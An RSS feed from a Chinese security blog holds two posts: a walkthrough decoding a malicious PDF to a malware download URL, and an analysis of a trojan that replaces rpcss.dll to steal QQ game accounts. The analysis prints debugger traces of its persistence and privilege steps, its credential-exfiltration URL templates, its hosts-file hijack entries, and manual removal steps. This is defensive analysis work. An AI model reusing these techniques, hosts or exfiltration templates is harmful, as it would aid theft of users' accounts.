<?xml version="1.0" encoding="UTF-8"?>
<rss version="2.0"
	xmlns:content="http://purl.org/rss/1.0/modules/content/"
	xmlns:wfw="http://wellformedweb.org/CommentAPI/"
	xmlns:dc="http://purl.org/dc/elements/1.1/"
	xmlns:atom="http://www.w3.org/2005/Atom"
	xmlns:sy="http://purl.org/rss/1.0/modules/syndication/"
	xmlns:slash="http://purl.org/rss/1.0/modules/slash/"
	>

<channel>
	<title>小米の网志 &#187; 信息安全</title>
	<atom:link href="http://imox.me/category/safe/feed" rel="self" type="application/rss+xml" />
	<link>http://imox.me</link>
	<description>又一个 WordPress 站点</description>
	<lastBuildDate>Sun, 01 Jan 2012 13:55:07 +0000</lastBuildDate>
	<language>en</language>
	<sy:updatePeriod>hourly</sy:updatePeriod>
	<sy:updateFrequency>1</sy:updateFrequency>
	<generator>http://wordpress.org/?v=3.3.1</generator>
		<item>
		<title>网马解密每日一练（一）</title>
		<link>http://imox.me/shellcode-test-one.shtml</link>
		<comments>http://imox.me/shellcode-test-one.shtml#comments</comments>
		<pubDate>Tue, 09 Mar 2010 13:09:51 +0000</pubDate>
		<dc:creator>admin</dc:creator>
				<category><![CDATA[信息安全]]></category>
		<category><![CDATA[pdf]]></category>
		<category><![CDATA[网马解密]]></category>

		<guid isPermaLink="false">http://imox.me/?p=231</guid>
		<description><![CDATA[今天我们练习的是PDF网马解密 下载PDF文件 1.先用RedoceA&#62;PDF/CWS/Zlib Extractor解压PDF中的数据流；得到JS代码，如下： 2.在神器里运行，得到几个输出数据，逐个查看，得到shellcode 3.将代码复制进redoce，5>Unicode清除(%u,u)(参数/无参数)，得到网马地址 http://googlenew.cn/mmm/exe.php]]></description>
			<content:encoded><![CDATA[<p>今天我们练习的是PDF网马解密<br />
<a href="http://bbs.ikaka.com/attachment.aspx?attachmentid=598075">下载PDF文件</a></p>
<p>1.先用RedoceA&gt;PDF/CWS/Zlib Extractor解压PDF中的数据流；得到JS代码，如下：<br />
<span id="more-231"></span><br />
<img class="alignnone" title="01" src="http://img.imox.me/pictures/01.jpg" alt="" width="400" height="300" /></p>
<p>2.在神器里运行，得到几个输出数据，逐个查看，得到shellcode<br />
<img class="alignnone" title="02" src="http://img.imox.me/pictures/02.jpg" alt="" width="413" height="375" /><br />
3.将代码复制进redoce，5>Unicode清除(%u,u)(参数/无参数)，得到网马地址</p>
<p>http://googlenew.cn/mmm/exe.php</p>
<p><img class="alignnone" title="03" src="http://img.imox.me/pictures/03.jpg" alt="" width="413" height="375" /></p>
]]></content:encoded>
			<wfw:commentRss>http://imox.me/shellcode-test-one.shtml/feed</wfw:commentRss>
		<slash:comments>0</slash:comments>
		</item>
		<item>
		<title>分析替换系统“rpcss.dll”文件的病毒和解决办法</title>
		<link>http://imox.me/kill-rpcss.shtml</link>
		<comments>http://imox.me/kill-rpcss.shtml#comments</comments>
		<pubDate>Thu, 04 Mar 2010 14:30:28 +0000</pubDate>
		<dc:creator>admin</dc:creator>
				<category><![CDATA[信息安全]]></category>
		<category><![CDATA[rpcss.dll]]></category>
		<category><![CDATA[病毒]]></category>

		<guid isPermaLink="false">http://imox.me/?p=206</guid>
		<description><![CDATA[分析替换系统“rpcss.dll”文件的病毒和解决办法 英文名称：TrojanSpy.OnLineGames.iyo 中文名称：“网游窃贼”变种iyo 病毒长度：12060字节 病毒类型：木马 危险级别：★★ 影响平台：Win 9X/ME/NT/2000/XP/2003 MD5 校验：c403b5d5ea1448efeb2d2ae71d41f5c3 ============================================================================================ 简单描述： 该病毒会通过替换系统“rpcss.dll”文件来实现开机自启动。是一个专门窃取QQ网络游戏帐号的木马程序。 同时，它还会窃取QQ网络游戏用户的密码保护资料。 中毒现象： 1、杀毒后系统不能上网。 2、杀毒后系统粘贴功能失效。 3、杀毒后系统任务栏上的部分信息不能正常显示。 4、杀毒后系统桌面程序“explorer.exe”启动非常慢，等好长时间才能显示出来桌面。 ============================================================================================ 病毒主程序“TrojanSpy.OnLineGames.iyo”部分的分析： ============================================================================================ 加壳名称：Upack V0.37 -&#62; Dwing * 采用高级语言编写。 入口：00002080 文件大小：12,060 字节。 释放恶意DLL组件： ASCII “C:DOCUME~1ADMINI~1LOCALS~1Temp~ddc967.tmp” 文件大小：34,816 字节，文件名称随机。 病毒主程序通过“rundll32.exe”进程调用运行病毒释放出来的DLL组件文件： 00402209 FF15 00204000 CALL DWORD PTR DS:[402000] ; kernel32.CreateProcessA 0012FC18 00000000 &#124;ModuleFileName = NULL 0012FC1C 0012FCB4 &#124;CommandLine = [...]]]></description>
			<content:encoded><![CDATA[<p>分析替换系统“rpcss.dll”文件的病毒和解决办法</p>
<p>英文名称：TrojanSpy.OnLineGames.iyo<br />
中文名称：“网游窃贼”变种iyo<br />
病毒长度：12060字节<br />
病毒类型：木马<br />
危险级别：★★<br />
影响平台：Win 9X/ME/NT/2000/XP/2003<br />
MD5 校验：c403b5d5ea1448efeb2d2ae71d41f5c3<br />
<span id="more-206"></span><br />
============================================================================================<br />
简单描述：<br />
该病毒会通过替换系统“rpcss.dll”文件来实现开机自启动。是一个专门窃取QQ网络游戏帐号的木马程序。</p>
<p>同时，它还会窃取QQ网络游戏用户的密码保护资料。</p>
<p>中毒现象：<br />
1、杀毒后系统不能上网。<br />
2、杀毒后系统粘贴功能失效。<br />
3、杀毒后系统任务栏上的部分信息不能正常显示。<br />
4、杀毒后系统桌面程序“explorer.exe”启动非常慢，等好长时间才能显示出来桌面。<br />
============================================================================================</p>
<p>病毒主程序“TrojanSpy.OnLineGames.iyo”部分的分析：<br />
============================================================================================<br />
加壳名称：Upack V0.37 -&gt; Dwing *<br />
采用高级语言编写。<br />
入口：00002080<br />
文件大小：12,060 字节。</p>
<p>释放恶意DLL组件：<br />
ASCII “C:DOCUME~1ADMINI~1LOCALS~1Temp~ddc967.tmp” 文件大小：34,816 字节，文件名称随机。</p>
<p>病毒主程序通过“rundll32.exe”进程调用运行病毒释放出来的DLL组件文件：<br />
00402209 FF15 00204000 CALL DWORD PTR DS:[402000] ; kernel32.CreateProcessA<br />
0012FC18 00000000 |ModuleFileName = NULL<br />
0012FC1C 0012FCB4 |CommandLine = “rundll32 C:DOCUME~1ADMINI~1LOCALS~1Temp~ddc967.tmp</p>
<p>INS C:Documents and SettingsAdministrator桌面new13.10260422.exe”<br />
0012FC20 00000000 |pProcessSecurity = NULL<br />
0012FC24 00000000 |pThreadSecurity = NULL<br />
0012FC28 00000000 |InheritHandles = FALSE<br />
0012FC2C 00000000 |CreationFlags = 0<br />
0012FC30 00000000 |pEnvironment = NULL<br />
0012FC34 00000000 |CurrentDir = NULL<br />
0012FC38 0012FC44 |pStartupInfo = 0012FC44<br />
0012FC3C 0012FC88 pProcessInfo = 0012FC88</p>
<p>病毒主程序在被感染计算机系统中安装完毕后会自我删除。<br />
============================================================================================</p>
<p>病毒释放组件“~ddc967.tmp”部分的分析：<br />
============================================================================================<br />
采用高级语言编写，可能加壳。<br />
文件大小：34,816 字节。</p>
<p>该DLL组件一般会被插入到“explorer.exe”、“csrss.exe”、“svchost.exe”等系统进程，以及几乎所有</p>
<p>用户级权限的进程中加载运行，并在被感染计算机系统的后台执行恶意操作，隐藏自我，防止被用户发现、被安全</p>
<p>软件查杀。<br />
&#8212;&#8212;&#8212;&#8212;&#8212;&#8212;&#8212;&#8212;&#8212;&#8212;&#8212;&#8212;&#8212;&#8212;&#8212;&#8212;&#8212;&#8212;&#8212;&#8212;&#8212;&#8212;&#8212;&#8212;&#8212;&#8211;<br />
1、插入系统进程“csrss.exe”：<br />
监视DLL组件是否被调用，如果发现不存在(发现被关闭掉)则重新调用，达到自我保护的目的。</p>
<p>2、插入系统进程“explorer.exe”：<br />
调用病毒组件“C:WINDOWSsystem32gdipro.dll”运行。躲避安全软件主动防御和监控等，达到自我保护的目的。</p>
<p>3、插入系统进程“svchost.exe”：<br />
(1)、自我复制为“C:WINDOWSsystem32gdipro.dll”<br />
(2)、通过“sfc_os.dll”来去除系统“C:WINDOWSsystem32rpcss.dll”文件的保护：<br />
&#8212;&#8212;&#8212;&#8212;&#8212;&#8212;&#8212;&#8212;&#8212;&#8212;&#8212;&#8212;&#8212;&#8212;&#8211;<br />
10012D03 FF15 C0200110 CALL DWORD PTR DS:[&lt;&amp;KERNEL32.LoadLibrar&gt;; kernel32.LoadLibraryA<br />
0006F340 10012B2C FileName = “sfc_os.dll”</p>
<p>10012D10 FF15 C4200110 CALL DWORD PTR DS:[&lt;&amp;KERNEL32.GetProcAdd&gt;; kernel32.GetProcAddress<br />
0006F33C 76C30000 |hModule = 76C30000 (sfc_os)<br />
0006F340 00000005 ProcNameOrOrdinal = #5</p>
<p>10012D38 FFD6 CALL ESI ; sfc_os.#5<br />
0006F338 00000000<br />
0006F33C 0006F348 UNICODE “C:WINDOWSsystem32rpcss.dll”<br />
&#8212;&#8212;&#8212;&#8212;&#8212;&#8212;&#8212;&#8212;&#8212;&#8212;&#8212;&#8212;&#8212;&#8212;&#8211;<br />
(3)、用“DeleteFileA”删除系统文件“C:WINDOWSsystem32..ServicePackFilesi386rpcss.dll”</p>
<p>和“C:WINDOWSsystem32dllcacherpcss.dll”。<br />
(4)、用“MoveFileExA”移动系统文件“C:WINDOWSsystem32rpcss.dll”到“C:WINDOWSsystem32</p>
<p>srpcss.dll”处。<br />
10012E0D FF15 BC200110 CALL DWORD PTR DS:[&lt;&amp;KERNEL32.MoveFileEx&gt;; kernel32.MoveFileExA<br />
0006F45C 0006F67C |ExistingName = “C:WINDOWSsystem32rpcss.dll”<br />
0006F460 0006F578 |NewName = “C:WINDOWSsystem32srpcss.dll”<br />
0006F464 00000001 Flags = REPLACE_EXISTING<br />
(5)、用病毒释放出来的DLL组件文件“C:WINDOWSsystem32gdipro.dll”来替换系统文件“C:WINDOWS</p>
<p>system32rpcss.dll”。<br />
(6)、用“GetFileTime”、“SetFileTime”获取系统文件时间并重新设置被病毒替换后的DLL组件文件“C:WINDOWSsystem32rpcss.dll”的时间(创建和修改日期)，达到更好的自我隐藏的目的。<br />
(7)、释放DLL组件“C:WINDOWSsystem32sys17002.dll”(文件大小：23,040 字节)。<br />
(8)、用“GetFileTime”、“SetFileTime”获取系统文件时间并重新设置被病毒替换后的DLL组件文件“C:WINDOWSsystem32sys17002.dll”的时间(创建和修改日期)，达到更好的自我隐藏的目的。<br />
(9)、提升服务的权限，把“NT AUTHORITYNetworkService”改为最高权限“LocalSystem”：<br />
&#8212;&#8212;&#8212;&#8212;&#8212;&#8212;&#8212;&#8212;&#8212;&#8212;&#8212;&#8212;&#8212;&#8212;&#8211;<br />
10013313 FF15 18200110 CALL DWORD PTR DS:[&lt;&amp;ADVAPI32.RegOpenKey&gt;; ADVAPI32.RegOpenKeyExA<br />
0006F754 80000002 |hKey = HKEY_LOCAL_MACHINE<br />
0006F758 0006F770 |Subkey = “SYSTEMCurrentControlSetServicesrpcss”<br />
0006F75C 00000000 |Reserved = 0<br />
0006F760 000F003F |Access = KEY_ALL_ACCESS<br />
0006F764 0006F878 pHandle = 0006F878</p>
<p>10013340 FFD7 CALL EDI ; ADVAPI32.RegSetValueExA<br />
0006F74C 10013342 /CALL 到 RegSetValueExA 来自 gdipro.10013340<br />
0006F750 00000080 |hKey = 80<br />
0006F754 10012C30 |ValueName = “ObjectName”<br />
0006F758 00000000 |Reserved = 0<br />
0006F75C 00000002 |ValueType = REG_EXPAND_SZ<br />
0006F760 10012C3C |Buffer = gdipro.10012C3C(LocalSystem)<br />
0006F764 0000000C BufSize = C (12.)</p>
<p>10013352 FF15 10200110 CALL DWORD PTR DS:[&lt;&amp;ADVAPI32.RegOpenKey&gt;; ADVAPI32.RegOpenKeyA<br />
0006F75C 00000080 |hKey = 80<br />
0006F760 10012C24 |Subkey = “Parameters”<br />
0006F764 0006F874 pHandle = 0006F874</p>
<p>10013372 FFD7 CALL EDI ; ADVAPI32.RegSetValueExA<br />
0006F74C 10013374 /CALL 到 RegSetValueExA 来自 gdipro.10013372<br />
0006F750 00000084 |hKey = 84<br />
0006F754 10012C18 |ValueName = “ServiceDll”<br />
0006F758 00000000 |Reserved = 0<br />
0006F75C 00000002 |ValueType = REG_EXPAND_SZ<br />
0006F760 10011404 |Buffer = gdipro.10011404(C:WINDOWSsystem32rpcss.dll)<br />
0006F764 00000038 BufSize = 38 (56.)<br />
&#8212;&#8212;&#8212;&#8212;&#8212;&#8212;&#8212;&#8212;&#8212;&#8212;&#8212;&#8212;&#8212;&#8212;&#8211;<br />
(10)、“CreateRemoteThread”利用创建远线程的方式来调用运行“C:WINDOWSsystem32gdipro.dll”。<br />
&#8212;&#8212;&#8212;&#8212;&#8212;&#8212;&#8212;&#8212;&#8212;&#8212;&#8212;&#8212;&#8212;&#8212;&#8212;&#8212;&#8212;&#8212;&#8212;&#8212;&#8212;&#8212;&#8212;&#8212;&#8212;&#8211;</p>
<p>该病毒利用进程守护功能来实现自我保护。<br />
============================================================================================</p>
<p>病毒释放组件“sys17002.dll”部分的分析：<br />
============================================================================================<br />
加壳名称：dUP v2.x Patcher &#8211;&gt; www.diablo2oo2.cjb.net *<br />
采用高级语言编写。<br />
文件大小：34,816 字节。</p>
<p>释放驱动文件“C:WINDOWSsystem32drivershm17002.sys” -&gt;文件大小：5,120 字节。</p>
<p>创建病毒配置文件“C:WINDOWSsystem32sys17002.add”。</p>
<p>发现地址加密前：ASCII “7a^G?BBBaaa^3&gt;”<br />
发现地址解密后：ASCII “g1.worrr111.cn”</p>
<p>发信地址：</p>
<p>http://g1.worrr111.cn/1a/zz4/zz.asp?Game=17&#038;d00=&#038;d01=&#038;d10=&#038;d11=&#038;d21=&#038;d30=&#038;d31=&#038;d32=&#038;d40=0&#038;d45=0&#038;d42=0&#038;d70=0&#038;d71=0&#038;d50=&#038;d90=100</p>
<p>Game=17&amp;d00=%s&amp;d01=%s&amp;d10=%s&amp;d11=%s&amp;d21=%s&amp;d30=%s&amp;d31=%s&amp;d32=%s&amp;d40=%u&amp;d45=%u&amp;d42=%u&amp;d70=%d&amp;d71=%d&amp;d50=%s&amp;d90=%d</p>
<p>http://g1.worrr111.cn/1a/zz4/mibao.asp?</p>
<p>Game=17&amp;d10=%s&amp;d11=%s&amp;d00=%s&amp;d01=%s&amp;d20=%s:%s%%20%s:%s%%20%s:%s&amp;d70=%d&amp;d90=%d<br />
act=&amp;d10=%s&amp;d80=%d</p>
<p>盗网络游戏帐号“QQ华夏”、“地下城与勇士”：<br />
QQLogin.exe<br />
DNF.exe</p>
<p>盗取QQ网络游戏的密码保护等信息资料。</p>
<p>域名劫持(当用户访问如下网站时，会被定向到骇客服务器地址“212.103.11.59”上)：<br />
driversetchosts<br />
212.103.11.59tpassport.wanmei.com<br />
212.103.11.59treg.163.com<br />
212.103.11.59tsde.game.sohu.com<br />
212.103.11.59taccount.ztgame.com<br />
212.103.11.59tpwd.sdo.com<br />
212.103.11.59treg.91.com<br />
============================================================================================</p>
<p>病毒释放驱动“hm17002.sys”部分的分析：<br />
============================================================================================<br />
恶意驱动程序。<br />
文件大小：5,120 字节。</p>
<p>可能是利用驱动安装钩子截取QQ网络游戏密码，达到盗取游戏帐号的目的：<br />
!This program cannot be run in DOS mode.<br />
e:qqsgsetloa~1setloa~1objfre_wnet_x86i386SetLoadHook.pdb<br />
============================================================================================</p>
<p>============================================================================================<br />
手动删除该病毒的方法步骤(经过实际测试绝对有效)：</p>
<p>1、删除病毒文件“C:DOCUME~1ADMINI~1LOCALS~1Temp~*.tmp”、“C:WINDOWSsystem32 gdipro.dll”、“C:WINDOWSsystem32drivershm17002.sys”、“C:WINDOWS system32sys17002.dll”、“C:WINDOWSsystem32</p>
<p>sys17002.add”、“C:WINDOWS system32rpcss.dll”<br />
2、把系统文件“C:WINDOWSsystem32srpcss.dll”改名为“C:WINDOWSsystem32rpcss.dll”。</p>
<p>3、把注册表“HKEY_LOCAL_MACHINESYSTEMCurrentControlSetServicesrpcssObjectName”键值改为“NT AUTHORITYNetworkService”。</p>
<p>4、把注册表“HKEY_LOCAL_MACHINESYSTEMCurrentControlSetServicesrpcssParametersServiceDll”键值改为“%SystemRoot%system32rpcss.dll”。</p>
<p>5、重新启动计算机系统，系统杀毒修复完毕(系统重新启动后就可以上网了，粘贴功能有效了，同时任务栏的显示也正常了)。</p>
<p>6、使用杀毒软件进行全盘查杀病毒(该病毒为木马下载器下载到您计算机中的病毒，那个木马下载器还下载了N多其它病毒也同时安装到了您的计算机系统中)。</p>
]]></content:encoded>
			<wfw:commentRss>http://imox.me/kill-rpcss.shtml/feed</wfw:commentRss>
		<slash:comments>0</slash:comments>
		</item>
	</channel>
</rss>

